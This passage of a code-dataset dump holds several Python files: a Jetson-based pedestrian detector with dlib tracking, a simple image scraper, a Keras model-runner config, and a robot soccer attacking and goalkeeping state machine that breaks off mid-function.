1\r\n\tfh.write(\"};\\n\")\r\n\t\r\nfh.close()\r\n\r\nsuperName = \"TROO\"\t\r\nprint(\"Making super sprite %s\" % superName)\r\nargs = [spriteguy_path] + superImages + [superName + \".spr\", \"type=upright\"]\r\nsubprocess.check_call(args)\r\n\r\n\r\n# cleanup\r\nfor file in temp_files:\r\n\tos.remove(file)","repo_name":"wootguy/sc_doom","sub_path":"tools/monster_maker (old maybe).py","file_name":"monster_maker (old maybe).py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34048445473","text":"import jetson.inference\nimport jetson.utils\nimport time\nimport cv2\nimport numpy as np \n\nfrom imutils.video import FPS\nimport imutils\nimport dlib\n\n\n#some constants - hello world\ninput_URI = \"peds.mp4\"\nthreshold = 0.5\nnetwork = \"ssd-mobilenet-v2\"\n#network = \"ssd-inception-v2\"\noverlay = \"box,lables,conf\"\nfpsFilt=0\ndispW= 720\ndispH=480\nfont=cv2.FONT_HERSHEY_SIMPLEX\n\n# load the object detection network\nnet = jetson.inference.detectNet(network, threshold)\n\n# create video sources & outputs\ncap = cv2.VideoCapture('ped.mp4')\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, dispW)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, dispH)\n\n# initialize the list of object trackers and corresponding class\n# labels\ntrackers = []\nframe_num = 1\nskip_frames = 30\n\n\n# process frames until the user exits\nwhile cap.isOpened():\n\n timeStamp = time.time()\n\n # capture the next image\n ret,img = cap.read()\n if ret ==True:\n\n height = img.shape[0]\n width = img.shape[1]\n \n \n # convert to jetson inference format\n frame=cv2.cvtColor(img,cv2.COLOR_BGR2RGBA).astype(np.float32)\n frame=jetson.utils.cudaFromNumpy(frame)\n \n # convert to rgb for dlib processing\n rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n if (len(trackers) == 0 or frame_num % skip_frames == 0):\n # detect objects in the image (with overlay)\n print(\"detection run for frame no = \", frame_num)\n if len(trackers) == 0:\n len_trackers_zero_run = True\n detections = net.Detect(frame,width,height)\n for detect in detections: #for each detections\n ID=detect.ClassID\n item=net.GetClassDesc(ID)\n if item == \"person\":\n similarity = False #for current detected item similarity initialised to flase\n top= int(detect.Top)\n left=int(detect.Left)\n bottom=int(detect.Bottom)\n right=int(detect.Right)\n centerX = (right+left)/2\n centerY = (bottom+top)/2\n\n if len_trackers_zero_run: #if there are no objects in tracker then create the trackers with new detections\n # construct a dlib rectangle object from the bounding\n # box coordinates and start the correlation tracker\n print(\"first run trackers initialized\")\n t = dlib.correlation_tracker()\n rect = dlib.rectangle(left, top, right, bottom)\n t.start_track(rgb, rect)\n # update our set of trackers and corresponding class\n trackers.append(t)\n else: \n print(\"similarity check initialised\") \n for t in trackers:\n \n pos = t.get_position()\n\n # unpack the position object\n startX = int(pos.left())\n startY = int(pos.top())\n endX = int(pos.right())\n endY = int(pos.bottom())\n\n tcenterX = (endX+startX)/2\n tcenterY = (endY+startY)/2\n\n a = np.array((centerX, centerY))\n b = np.array((tcenterX,tcenterY))\n\n dist = np.linalg.norm(a-b)\n print(\"calculated distance = \", dist)\n if dist < 50 : #if the tracker object is close than 50 pixels for the current item \n similarity = True #iteration then break \n break \n elif dist > 50:\n similarity = False\n\n if similarity == False: \n # 
construct a dlib rectangle object from the bounding\n # box coordinates and start the correlation tracker\n print(\"similarity false loop activated\")\n t = dlib.correlation_tracker()\n rect = dlib.rectangle(left, top, right, bottom)\n t.start_track(rgb, rect)\n\n # update our set of trackers and corresponding class\n trackers.append(t)\n \n\n # put text and draw the bounding box\n cv2.putText(img, \"detection mode\", (left, top - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)\n\n cv2.rectangle(img,(left,top),(right,bottom),(0,0,255),2)\n if len_trackers_zero_run:\n print(\"total objects for zero run = \", len(trackers))\n len_trackers_zero_run = False \n \n # otherwise, we've already performed detection so let's track\n\t # multiple objects\n else:\n # loop over each of the trackers\n for t in trackers:\n # update the tracker and grab the position of the tracked\n # object\n t.update(rgb)\n pos = t.get_position()\n\n # unpack the position object\n startX = int(pos.left())\n startY = int(pos.top())\n endX = int(pos.right())\n endY = int(pos.bottom())\n\n # draw the bounding box from the correlation object tracker\n cv2.rectangle(img, (startX, startY), (endX, endY),\n (0, 255, 0), 2)\n cv2.putText(img, \"tracking\", (startX, startY - 15),\n cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 255, 0), 2) \n\n \n dt=time.time()-timeStamp\n timeStamp=time.time()\n fps=1/dt\n fpsFilt=.9*fpsFilt + .1*fps\n #print(str(round(fps,1))+' fps')\n cv2.putText(img,str(round(fpsFilt,1))+' fps',(0,30),font,1,(0,0,255),2)\n cv2.putText(img,str(round(len(trackers)))+' persons detected',(0,60),font,1,(0,230,255),2)\n cv2.imshow('detCam',img)\n if cv2.waitKey(1)==ord('q'):\n break\n else:\n break\n\n frame_num += 1 \n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"ParasCodesAi/objectTracking","sub_path":"detectNtrac.py","file_name":"detectNtrac.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7640355199","text":"#!/usr/bin/python3\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nimport sys\n\n\n#site = 'https://www.codespeedy.com/'\n#site = sys.argv[1]\nsite = input(\"Please provide the site address : \")\n\nresponse = requests.get(site)\nsoup = BeautifulSoup(response.text, 'html.parser')\nimage_tags = soup.find_all('img')\nurls = [img['src'] for img in image_tags]\n#print(f'URLs { urls }')\n#noOfImgs = int(sys.argv[2])\nnoOfImgs = int(input(\"Please provide number of images to download : \") or len(urls))\n\ndef create_dir(dir):\n if not os.path.exists(dir):\n os.makedirs(dir)\n print(\"Created Directory : \", dir)\n else:\n print(\"Directory already existed : \", dir)\n return dir\n\ncustDir=create_dir(input(\"Please provide the download path : \") or 'downloaded_images')\n\nfor url in urls[0:noOfImgs]:\n filename = re.search(r'/([\\w_-]+[.](jpg|gif|png))$', url)\n if not filename:\n print(\"Regular expression didn't match with the url: {}\".format(url))\n continue\n with open( f'{custDir}/{filename.group(1)}', 'wb') as f:\n if 'http' not in url:\n url = '{}{}'.format(site, url)\n response = requests.get(url)\n f.write(response.content)\n\nprint(f\"Download complete, downloaded images can be found in {custDir} directory!\")\n","repo_name":"richiricha/ImageDownload","sub_path":"python/downpic.py","file_name":"downpic.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
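The scraper in the record above indexes img['src'] directly and anchors its filename regex to the end of the URL, so a src-less <img> tag raises KeyError and any image URL carrying a query string is skipped silently. A more defensive collection pass might look like the sketch below — an illustrative rewrite, not code from the ImageDownload repo; the helper name collect_image_urls and the urljoin/urlparse handling are my additions:

import os
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse

def collect_image_urls(site):
    """Return (absolute_url, filename) pairs for images on `site`, skipping unusable tags."""
    soup = BeautifulSoup(requests.get(site, timeout=10).text, 'html.parser')
    pairs = []
    for img in soup.find_all('img'):
        src = img.get('src')  # .get() avoids KeyError on <img> tags with no src
        if not src or src.startswith('data:'):
            continue  # inline data-URIs have no filename to save under
        absolute = urljoin(site, src)  # resolves relative paths against the page URL
        name = os.path.basename(urlparse(absolute).path)  # drops any ?query suffix
        if name.lower().endswith(('.jpg', '.jpeg', '.gif', '.png')):
            pairs.append((absolute, name))
    return pairs

Feeding these pairs into the script's existing download loop would replace both the regex match and the manual 'http' prefix check in one step.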
+{"seq_id":"4350409784","text":"from tensorflow.keras.optimizers import Adam, SGD, RMSprop\n\nfrom models.core.validation.ModelRunner import ModelRunner\n\n\nclass BaseModelRunner(ModelRunner):\n def __init__(self, model_builder, image_size=(224, 224), batch_size=128, augmentation=None):\n params, model_builders = self._get_model_compile_params_model_builders(model_builder)\n super().__init__(model_builders, params, [image_size] * len(model_builders), batch_size, augmentation)\n\n @staticmethod\n def _get_model_compile_params_model_builders(model_builder):\n params = [\n {\"dropout\": .7, \"optimizer\": Adam(.00001)},\n {\"dense\": 128, \"optimizer\": Adam()},\n {\"optimizer\": SGD(.005)},\n {\"dense\": 128, \"optimizer\": RMSprop(.0001)},\n {\"dense\": 128, \"dropout\": .1, \"optimizer\": Adam(.00001)}\n ]\n model_builders = [model_builder] * len(params)\n return params, model_builders\n","repo_name":"mbirkholzupc/mai_ci_ddmr","sub_path":"models/core/validation/BaseModelRunner.py","file_name":"BaseModelRunner.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41837924207","text":"import memory, pose, commands, head, util, cfgpose, cfgstiff, mem_objects, core, random, numpy, math\nfrom task import Task\nfrom state_machine import *\nfrom memory import *\nfrom sets import Set\n#from enum import Enum\n\nclass Ready(Task):\n def run(self):\n commands.stand()\n if self.getTime() > 3.0:\n self.finish()\n\n#Fields = Enum('Fields', 'A B')\n#Modes = Enum('Modes', 'passive attacking defending')\n#AttackingStates = Enum('AttackingStates', 'start approach rotate dribble align kick')\n#DefendingStates = Enum('DefendingStates', 'start')\nclass Fields: \n A=0\n B=1\n\nclass Modes:\n passive=0\n attacking=1\n defending=2\n\nclass EnemyGoalStates:\n unknown=0\n center=1\n left=2\n right=3\n\nclass AttackingStates:\n start=0\n approach=1\n rotate=2\n dribble=3\n align=4\n kick=5\n\nclass DefendingStates:\n start=0\n walk_center=1\n walk_left=2\n walk_right=3\n walk=4\n block=5\n sit=6\n block_left=7\n block_right=8\n\nfield = Fields.A\nmode = Modes.passive\nenemy_state = EnemyGoalStates.unknown\ncurrent_state = AttackingStates.start\nlast_mode_change_time = 0\nr_goal_dist_filtered = 0.\n\n#attacking globals\nrotation_dir = 1.\nlast_ball_seen_time = 0\nnext_head_time = 0\nkick_start_time = 0\nkick_sent = False\nrecovering_from_kick = False\nattack_left = False\n\n#defending globals\nif_seen_history_constant =9\nif_seen_history = [0]*if_seen_history_constant\nif_seen_history_counter = 0\n\nlast_inf_constant = 2\nlast_x = [0]*last_inf_constant\nlast_y = [0]*last_inf_constant\nlast_xv = [0]*last_inf_constant\nlast_yv = [0]*last_inf_constant\nlast_bearing = [0]*last_inf_constant\nlast_distance = [0]*last_inf_constant\nlast_av_px = [0]*last_inf_constant\nlast_state_counter = 0\n\ndt = 1.0/30.0\nfriction = 0.35\n\nlast_head_time = 0\nlast_head_pan = 1.2\nbody_turning_flag = 0\nblock_trigger_flag = 0\npose_sent = False\nnum_times_sent = 0\npose_start_time = 0\ndefense_time = 0\ndefense_delay_time = 0\nwalk_start_time = 0\n\ndef tanhController(err, kx, max_cmd):\n return max_cmd * numpy.tanh(kx * err)\n\nclass Playing(StateMachine):\n class Stand(Node):\n def run(self):\n commands.stand()\n if self.getTime() > 5.0:\n self.finish()\n\n class Win(Node):\n def toPose(self, pose, time):\n global pose_sent, pose_start_time, num_times_sent\n commands.setStiffness()\n times_to_send = 1\n if num_times_sent < 
times_to_send:\n for i in range(2, core.NUM_JOINTS):\n val = util.getPoseJoint(i, pose, False)\n if val != None:\n joint_commands.setJointCommand(i, val * core.DEG_T_RAD)\n\n joint_commands.send_body_angles_ = True\n joint_commands.body_angle_time_ = time * 1000.0\n walk_request.noWalk()\n kick_request.setNoKick()\n num_times_sent = num_times_sent+1\n pose_start_time = self.getTime()\n #print \"Sending pose at time \" + str(pose_start_time) + \"! #\" + str(num_times_sent)\n\n if num_times_sent >= times_to_send and ((self.getTime() - pose_start_time) > time):\n #print \"DONE!\"\n return True\n else:\n return False\n\n def walk(self, vx, vy, vt):\n commands.setWalkVelocity(vx+0.1, vy+0.0, vt+0.0)\n\n def stop(self):\n commands.setWalkVelocity(0.,0.,0.)\n\n def track_ball(self):\n commands.setHeadPan(0, 2.0)\n # global last_ball_seen_time, next_head_time\n # ball = memory.world_objects.getObjPtr(core.WO_BALL)\n # max_vel = 10.0\n # if ball.seen:\n # last_ball_seen_time = self.getTime()\n # return\n # commands.setHeadPan(ball.visionBearing, numpy.abs(core.joint_values[core.HeadYaw] - ball.visionBearing) / max_vel)\n # else:\n # if((self.getTime() - last_ball_seen_time) > 1.0 and self.getTime() > next_head_time):\n # target = random.uniform(-1.5, 1.5)\n # dt = numpy.abs(core.joint_values[core.HeadYaw] - target) / max_vel\n # commands.setHeadPan(target, dt)\n # next_head_time = self.getTime() + dt\n\n def walk_to(self, obj, r_threshold):\n global have_lock, facing_center, at_center\n # memory.speech.say(\"Walking!\")\n sloc = mem_objects.world_objects[robot_state.WO_SELF].loc\n t = -mem_objects.world_objects[robot_state.WO_SELF].orientation\n cx = obj.visionDistance * numpy.cos(obj.visionBearing)\n cy = obj.visionDistance * numpy.sin(obj.visionBearing)\n r = numpy.sqrt(cx*cx+cy*cy)\n t_err = numpy.arctan2(cy, cx)\n #print \"local target x,y = \" + str(cx) + \",\" + str(cy)\n\n if(r < r_threshold):\n #print \"Stopping\"\n self.stop()\n return True\n\n x_vel = tanhController(cx, 10.0 / 1000.0, 0.4)\n y_vel = tanhController(cy, 10.0 / 1000.0, 0.4)\n t_vel = 0.0\n #print \"vel x,y,t = \" + str(x_vel) + \",\" + str(y_vel) + \",\" + str(t_vel)\n self.walk(x_vel,y_vel,t_vel)\n return False\n\n#DEFENSE============================================================================================\n def defense_start(self):\n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n global if_seen_history_constant , last_inf_constant\n global if_seen_history , if_seen_history_counter , last_x , last_y , last_xv , last_yv , last_bearing , last_distance , last_state_counter,last_av_px\n global friction, dt\n global last_head_time, last_head_pan, body_turning_flag, block_trigger_flag, pose_sent, num_times_sent\n\n # commands.stand()\n commands.setHeadTilt(-13)\n ball = mem_objects.world_objects[core.WO_BALL]\n if_seen_history[if_seen_history_counter] = ball.seen;\n if_seen_history_counter = (if_seen_history_counter + 1)%if_seen_history_constant;\n seen_times = sum(if_seen_history)\n\n x = 0.\n y = 0.\n d = 0.\n bearing = 0.\n xv = 0.\n yv = 0.\n px = 0.\n if(seen_times > ( if_seen_history_constant/2 )): # It is actually seen\n #print \"seen_times = \" + str(seen_times) \n if(ball.seen):\n bearing = ball.visionBearing\n distance = ball.visionDistance\n x = ball.loc.x\n y = ball.loc.y\n xv = ball.absVel.x\n yv = ball.absVel.y\n else:\n return\n \n if( abs(xv) > 3000 or abs(yv) > 3000) :\n return\n\n \n #print \"x = \" + str(x) + \" y = \" + str(y) + \" xv = \" + 
str(xv) +\" yv = \" + str(yv)\n \n last_av_bearing = sum(last_bearing)/last_inf_constant\n\n last_x[last_state_counter] = x\n last_y[last_state_counter] = y\n last_xv[last_state_counter] = xv\n last_yv[last_state_counter] = yv\n last_distance[last_state_counter] = distance\n last_bearing[last_state_counter] = bearing\n\n # av_x = x\n # av_y = y\n # av_xv = xv\n # av_yv = yv\n # av_distance = distance\n # av_bearing = bearing\n\n av_x = sum(last_x)/last_inf_constant\n av_y = sum(last_y)/last_inf_constant\n av_xv = sum(last_xv)/last_inf_constant\n av_yv = sum(last_yv)/last_inf_constant\n av_distance = sum(last_distance)/last_inf_constant\n av_bearing = sum(last_bearing)/last_inf_constant\n\n px = av_x + (av_xv*abs(av_xv)/(2*1000*friction))\n last_av_px[last_state_counter] = px\n av_px = sum(last_av_px)/last_inf_constant\n last_state_counter = (last_state_counter + 1)%last_inf_constant\n\n #print \"av_vx = \" + str(av_xv) + \"\\tav_vy = \" + str(av_yv)\n #print(\"av_px = \") + str(av_px) + \" \\tseen_times = \" + str(seen_times)\n\n #print \"Avg : av_x = \" + str(av_x) + \" av_y = \" + str(av_y) + \" av_xv = \" + str(av_xv) +\" av_yv = \" + str(av_yv)\n\n if(av_bearing > 1.4):\n av_bearing = 1.4\n elif(av_bearing < -1.4):\n av_bearing = -1.4\n\n d_turning = abs(av_bearing - last_av_bearing)/2.5\n if(d_turning < 0.1):\n d_turning = 0.1\n elif(d_turning > 2):\n d_turning = 2\n commands.setHeadPan(av_bearing, d_turning)\n\n #print \"av_xy = \" + str(av_xv) + \"\\tav_y = \" + str(av_yv) + \"\\tflag = \" + str(body_turning_flag) + \"\\tPAN: \" + str(core.joint_values[core.HeadYaw])\n if( (abs(av_xv) < 300 and abs(av_yv) < 300 ) or body_turning_flag == 1):\n head_pan = core.joint_values[core.HeadYaw]\n if(head_pan > 0.2):\n body_turning_flag = 1\n commands.setWalkVelocity(0.1, 0.4, 0.13)\n elif(head_pan < -0.2):\n body_turning_flag = 1\n commands.setWalkVelocity(0.15,-0.3,-0.05)\n else:\n commands.stand()\n body_turning_flag = 0\n return\n\n if(av_xv > -200 or (abs(av_yv)+0.01)/(abs(av_xv)+0.01) > 1):\n #print(\" No!!!!: Vx > 0 or Vx / Vy large , Vx = \") + str(av_xv) + \" Vy = \" + str(av_yv) + \" seen_times = \" + str(seen_times)\n block_trigger_flag = 0\n return\n elif( av_px > -1100 ):\n #print(\" No!!!!: Ball too short px = \") + str(av_px) + \" seen_times = \" + str(seen_times)\n block_trigger_flag = 0\n return \n elif( av_distance < 1200 and av_xv < -100):\n block_trigger_flag = block_trigger_flag + 1\n lamda = av_yv / av_xv\n intercept = av_y - lamda*av_x\n hit_goal_line = lamda*(-1300) + intercept\n\n if(block_trigger_flag > 2):\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n #print \"=========================================================================\"\n \n block_trigger_flag = 0\n if( hit_goal_line < -200 and hit_goal_line > -550):\n #print \" Left : Yes: av_px = \" + str(av_px) + \" hit_goal_line = \" + str(hit_goal_line)\n pose_sent = False\n num_times_sent = 0\n current_state = DefendingStates.block_right\n #choice = \"right\"\n #self.postSignal(choice)\n elif( hit_goal_line > 200 and hit_goal_line < 550):\n #print \" Right : av_px = \" + str(av_px) + \" hit_goal_line = \" + str(hit_goal_line)\n 
pose_sent = False\n num_times_sent = 0\n current_state = DefendingStates.block_left\n # choice = \"left\"\n # self.postSignal(choice)\n elif( hit_goal_line > -200 and hit_goal_line < 200):\n #print \" Center: av_px = \" + str(av_px) + \" hit_goal_line = \" + str(hit_goal_line)\n pose_sent = False\n num_times_sent = 0\n current_state = DefendingStates.block\n # choice = \"center\"\n # self.postSignal(choice)\n\n else: # Think ball is still not seen\n #memory.speech.say(\"No ball\")\n commands.stand()\n if ((self.getTime() - last_head_time) > 3):\n if(last_head_pan > 0 ):\n last_head_pan = -1.2\n elif(last_head_pan <= 0):\n last_head_pan = 1.2\n commands.setHeadPan( last_head_pan , 2.5 )\n last_head_time = self.getTime()\n last_x = [0]*last_inf_constant\n last_y = [0]*last_inf_constant\n last_xv = [0]*last_inf_constant\n last_yv = [0]*last_inf_constant\n last_distance =[0]*last_inf_constant\n last_bearing = [0]*last_inf_constant\n\n def defense_block(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n #print \"center : =========================================================================\"\n if(self.toPose({\n core.LHipYawPitch: -50.7990128575929,\n core.LHipRoll: -29.7098065875597,\n core.LHipPitch: -36.1211002557756,\n core.LKneePitch: 123.397585319279,\n core.LAnklePitch: -48.8526839844773,\n core.LAnkleRoll: 12.8,\n core.RHipYawPitch: -50,\n core.RHipRoll: -30.6718114113993,\n core.RHipPitch: -37.3563946086858,\n core.RKneePitch: 125.072320383009,\n core.RAnklePitch: -48.5,\n core.RAnkleRoll: 11.4,\n core.LShoulderPitch: -79,\n core.LShoulderRoll: 25,\n core.RShoulderPitch: -79,\n core.RShoulderRoll: 26\n }\n , 1.0\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 4:\n pose_sent = False\n num_times_sent = 0\n pose_start_time = 0\n #print \"CHANGING TO SIT\"\n current_state = DefendingStates.sit\n\n def defense_block_left(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n #print \"left : =========================================================================\"\n if(self.toPose({ \n core.RHipYawPitch : 0,\n core.RHipRoll : 20,\n core.RHipPitch : -32,\n core.RKneePitch : 76,\n core.RAnklePitch : -40,\n core.RAnkleRoll : 17,\n core.LHipYawPitch : 0,\n core.LHipRoll : -34,\n core.LHipPitch : -49,\n core.LKneePitch : 125,\n core.LAnklePitch : -70,\n core.LAnkleRoll : -5,\n core.RShoulderPitch : -97,\n core.RShoulderRoll : 7,\n core.LShoulderPitch : -91,\n core.LShoulderRoll : 45\n }\n , 0.5\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 4:\n pose_start_time = 0\n pose_sent = False\n num_times_sent = 0\n #print \"CHANGING TO SIT\"\n current_state = DefendingStates.sit\n\n def defense_block_right(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n #print \"right : =========================================================================\"\n if(self.toPose({ \n core.LHipYawPitch : 0 ,\n core.LHipRoll : 20 ,\n core.LHipPitch : -32 ,\n core.LKneePitch : 76 ,\n core.LAnklePitch : -40 ,\n core.LAnkleRoll : 17 ,\n core.RHipYawPitch : 0 ,\n core.RHipRoll : -34 ,\n core.RHipPitch : -49 ,\n core.RKneePitch : 125 ,\n core.RAnklePitch : -70 ,\n core.RAnkleRoll : -5 ,\n core.LShoulderPitch : -97 ,\n core.LShoulderRoll : 7 ,\n core.RShoulderPitch : -91 ,\n core.RShoulderRoll : 45 \n }\n , 
0.5\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 4:\n pose_start_time = 0 \n pose_sent = False\n num_times_sent = 0\n #print \"CHANGING TO SIT\"\n current_state = DefendingStates.sit\n\n def defense_sit(self):\n global current_state, DefendingStates, pose_sent, pose_start_time, num_times_sent\n if(self.toPose({ \n core.HeadYaw: 1.8433177928247,\n core.HeadPitch: -22.497878144835,\n core.LHipYawPitch: -4.18321199506924,\n core.LHipRoll: 0.261268396131328,\n core.LHipPitch: -46.5802099129511,\n core.LKneePitch: 123.485476193518,\n core.LAnklePitch: -70.5794592600033,\n core.LAnkleRoll: -0.0902951008275686,\n core.RHipYawPitch: -5.18321199506924,\n core.RHipRoll: 0.266076849307017,\n core.RHipPitch: -47.2002681461832,\n core.RKneePitch: 124.72075688605,\n core.RAnklePitch: -70.3988690583481,\n core.RAnkleRoll: -0.0854866476518796,\n core.LShoulderPitch: -92.0202358571845,\n core.LShoulderRoll: 2.54645844712083,\n core.RShoulderPitch: -92.1129420147891,\n core.RShoulderRoll: 2.55126690029652,\n }\n , 1.5\n )):\n #print \"pose time: \" + str(pose_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - pose_start_time) > 6.5:\n pose_start_time = 0\n pose_sent = False\n num_times_sent = 0\n #print \"CHANGING TO START\"\n current_state = DefendingStates.start\n elif (self.getTime() - pose_start_time) > 3.5:\n commands.stand()\n\n def defense_walk(self):\n global walk_start_time, current_state, DefendingStates\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.3,0.0,0.05)\n #print \"walk time: \" + str(walk_start_time)\n #print \"current time: \" + str(self.getTime())\n if (self.getTime() - walk_start_time) > 9.0:\n current_state = DefendingStates.start\n # commands.setWalkVelocity(0.0,0.0,0.0)\n commands.stand()\n\n def defense_walk_left(self):\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.0,0.5,0.05)\n\n def defense_walk_right(self):\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.0,-0.5,0.05)\n\n def defense_walk_center(self):\n commands.setHeadTilt(-13)\n commands.setWalkVelocity(0.0,0.0,0.0)\n\n#ATTACKING=================================================================================\n def attack_start(self):\n commands.setHeadTilt(-10)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_beacon_lm_seen = mem_objects.world_objects[core.WO_BEACON_BLUE_PINK].seen or mem_objects.world_objects[core.WO_BEACON_PINK_BLUE].seen\n o_beacon_rf_seen = mem_objects.world_objects[core.WO_BEACON_YELLOW_PINK].seen or mem_objects.world_objects[core.WO_BEACON_PINK_YELLOW].seen\n o_beacon_rr_seen = mem_objects.world_objects[core.WO_BEACON_YELLOW_BLUE].seen or mem_objects.world_objects[core.WO_BEACON_BLUE_YELLOW].seen\n\n rotation_dir = 1. 
if (not o_beacon_lm_seen and (o_beacon_rf_seen or o_beacon_rr_seen)) else -1.\n\n if rotation_dir > 0:\n memory.speech.say(\"Started on the left\")\n else:\n memory.speech.say(\"Started on the right\")\n \n if(o_ball.seen): \n current_state = AttackingStates.approach\n else:\n self.walk(0.0, 0.0, rotation_dir*0.2)\n\n def attack_approach(self):\n commands.setHeadTilt(-14)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n\n if(o_ball.seen): \n if(self.walk_to(o_ball, 250)):\n current_state = AttackingStates.rotate\n return\n # else:\n # memory.speech.say(\"Lost the ball\")\n\n def attack_rotate(self):\n commands.setHeadTilt(-16)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n\n if(o_ball.seen and o_goal.seen):\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n if(numpy.abs(gy) <= 200):\n self.stop()\n current_state = AttackingStates.dribble\n return\n\n bx = o_ball.visionDistance * numpy.cos(o_ball.visionBearing)\n x_vel = tanhController(bx - 250, 10.0, 0.3) # 0.1 #-0.05\n y_vel = 0.4\n t_vel = tanhController(o_ball.visionBearing, 10.0, 0.3) \n if(rotation_dir > 0):\n y_vel = y_vel * -1.\n\n self.walk(x_vel, y_vel, t_vel)\n\n\n def attack_dribble(self):\n commands.setHeadTilt(-16)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, r_goal_dist_filtered\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n\n if(not o_goal.seen):\n #print \"Lost the goal!\"\n self.stop()\n current_state = AttackingStates.rotate\n return\n\n if(not o_ball.seen):\n #print \"Lost the ball!\"\n self.walk(-0.3, 0.0, 0.0)\n return\n\n gx = o_goal.visionDistance * numpy.cos(o_goal.visionBearing)\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n bx = o_ball.visionDistance * numpy.cos(o_ball.visionBearing)\n by = o_ball.visionDistance * numpy.sin(o_ball.visionBearing)\n\n dx_gb = gx - bx\n dy_gb = gy - by\n dt_gb = numpy.arctan2(dy_gb, dx_gb)\n r_goal_ball = numpy.sqrt(dx_gb * dx_gb + dy_gb * dy_gb)\n alpha = 0.3\n r_goal_dist_filtered = alpha*r_goal_ball + (1.0-alpha)*r_goal_dist_filtered\n r_goal_threshold = 750. 
* numpy.sqrt(2.)\n # r_goal_threshold = 725 * numpy.sqrt(2.)\n\n #print \"gx: \" + str(gx)\n #print \"gy: \" + str(gy)\n #print \"bx: \" + str(bx)\n #print \"by: \" + str(by)\n #print \"dx_gb: \" + str(dx_gb)\n #print \"dy_gb: \" + str(dy_gb)\n #print \"dt_gb: \" + str(dt_gb)\n\n if(r_goal_dist_filtered < r_goal_threshold):\n #print \"Stopping with threshold \" + str(r_goal_dist_filtered)\n # memory.speech.say(\"Distance \" + str(int(r_goal_dist_filtered)) + \", aligning\")\n current_state = AttackingStates.align\n return\n\n x_vel = 0.3 if numpy.abs(by) < 200 else 0.\n y_vel = tanhController((gy + by)/2.0, 20.0/1000.0, 0.35) \n t_vel = tanhController(dy_gb, 10.0/1000.0, 0.2) \n #print \"vel x,y,t = \" + str(x_vel) + \",\" + str(y_vel) + \",\" + str(t_vel)\n self.walk(x_vel, y_vel, t_vel)\n\n def attack_align(self):\n commands.setHeadTilt(-18)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, kick_sent, attack_left, r_goal_dist_filtered\n o_self = mem_objects.world_objects[robot_state.WO_SELF]\n o_ball = mem_objects.world_objects[core.WO_BALL]\n o_goal = mem_objects.world_objects[core.WO_OPP_GOAL]\n o_enemy = mem_objects.world_objects[core.WO_OPPONENT1]\n \n if(enemy_state is EnemyGoalStates.unknown):\n if(not o_enemy.seen):\n #print \"Can't find the enemy!\"\n enemy_state = EnemyGoalStates.center\n self.walk(-0.3, 0.0, 0.0)\n return\n if(not o_goal.seen):\n #print \"Can't find the goal!\"\n self.walk(-0.3, 0.0, 0.0)\n return\n else:\n gx = o_goal.visionDistance * numpy.cos(o_goal.visionBearing)\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n ex = o_enemy.visionDistance * numpy.cos(o_enemy.visionBearing)\n ey = o_enemy.visionDistance * numpy.sin(o_enemy.visionBearing)\n center_threshold = o_goal.radius*0.1\n #print \"Threshold: \" + str(center_threshold)\n shift = gy - ey\n if(numpy.abs(shift) < center_threshold):\n # attack_left = bool(random.getrandbits(1))\n 